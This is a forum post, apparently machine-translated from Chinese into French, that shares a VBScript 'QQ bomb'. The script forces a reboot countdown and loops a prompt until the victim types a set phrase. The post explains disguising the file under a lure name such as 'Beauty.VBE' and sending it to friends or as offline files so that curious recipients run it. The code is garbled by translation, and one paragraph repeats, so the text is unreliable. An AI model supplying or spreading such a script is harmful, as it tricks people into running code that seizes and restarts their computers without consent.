<Su a partagé>Pour célébrer l'établissement du système de position ¤Qingcheng¤, une méthode simple de fabrication de bombe QQ est publiée
Déclarez solennellement : Cette méthode est uniquement destinée au divertissement. Veuillez ne pas l'utiliser pour des activités illégales, sinon vous serez responsable des conséquences ! Première étape, copiez le code suivant dans le bloc-notes. en cas d'erreur, reprendre nextdim WSHshellAset WSHshellA = wscript. createobject("wscript.shell") WSHshellA. exécutez "cmd.exe /c shutdown -r -t 30 -c ""Dites-moi rapidement que 7723 est le meilleur. Si vous ne me le dites pas, j'éteindrai votre ordinateur dans 30 secondes. Si vous ne me croyez pas, essayez ***""", 0, truedim ado while (a<>"7723 est le meilleur") a = inputbox ("Dites 7723 est le meilleur, dépêchez-vous, dites ""7723 est le meilleur" "", "Dites ou ne dites pas", "Ne dites pas", 8000, 7000) msgbox chr (13) chr (13) chr (13) a, 0, "MsgBox" Le texte au-dessus de la boucle peut être modifié à volonté, sans aucune impression. Si vous l'envoyez à MM, vous pouvez la forcer à dire "je t'aime". La méthode est que le 7723 ci-dessus peut être modifié à volonté sans affecter l'effet. La deuxième étape consiste à renommer le fichier du bloc-notes en ***. Une simple bombe QQ comme VBE (le nom du fichier peut être arbitraire, comme "Beauty. VBE") a été réalisée. Si quelqu'un utilise cette bombe QQ, elle s'éteindra automatiquement après 30 secondes. Parlons de la façon de l'utiliser : la façon la plus simple de l'utiliser est de l'envoyer directement à votre ami et de le laisser l'exécuter, et il sera alors trompé. Il y a une autre chose encore plus vicieuse. Vous pouvez envoyer des fichiers hors ligne QQ à des amis QQ qui ne sont pas en ligne. Près de 80 % des personnes seront curieuses de savoir ce qu'est ce fichier et l'ouvriront dans la confusion. Après l'avoir ouvert, vous serez piégé par la bombe QQ. Vous pouvez également tester la puissance de cette bombe QQ. La deuxième étape consiste à renommer le fichier du bloc-notes en ***. Une simple bombe QQ comme VBE (le nom du fichier peut être arbitraire, comme "Beauty. VBE") a été réalisée. Si quelqu'un utilise cette bombe QQ, elle s'éteindra automatiquement après 30 secondes. Vous pouvez également tester vous-même la puissance de cette bombe QQ. Après avoir appris, n'oubliez pas de répondre. (Si l'autre partie vous l'envoie, entrez shutdown -a pour le déchiffrer).
Réponses (5)
Le frère du canapé s'est assis
Je n'ai pas compris..
Je le savais depuis longtemps, mais j'ai utilisé le langage Yi pour le programmer.
Euh... comment trouver le fichier du bloc-notes ? Et est-ce que cela pourrait nuire au téléphone ?
Bon post..
— Toutes les réponses chargées —